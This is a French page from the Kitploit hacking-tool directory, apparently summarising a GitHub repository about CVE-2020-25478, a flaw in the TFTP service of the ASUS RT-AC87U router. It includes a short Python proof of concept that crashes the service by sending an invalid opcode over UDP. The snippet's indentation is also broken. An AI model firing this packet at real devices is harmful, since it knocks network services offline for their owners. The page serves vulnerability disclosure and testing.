Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack | Kitploit
Outils/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Vulnerability AnalysisExploitationFuzzingHardware & IoT Security
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 3 ansPas encore vérifié

ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

CVE-2020-25478 - ASUS RT-AC87U TFTP est vulnérable à une attaque par déni de service (DoS)

  1. NOM DU PRODUIT(S) AFFECTÉ(S) ET VERSION(S)

ASUS RT-AC87U 3.0.0.4.382_51640

  1. TYPE DE PROBLÈME

Il est principalement lié à la CWE-20. Le service TFTP fonctionnant sur l'ASUS RT-AC87U est vulnérable à une attaque par déni de service (DoS) lorsqu'un opcode invalide est envoyé au service. L'extrait de code Python suivant est utilisé pour tester la vulnérabilité :

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. DESCRIPTION

Asus RT-AC87U version 3.0.0.4.382_51640 est vulnérable à une attaque par déni de service sur le service TFTP, provoquant le plantage du service TFTP. Le service TFTP peut planter à distance en envoyant un opcode invalide.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

Télécharger l’outil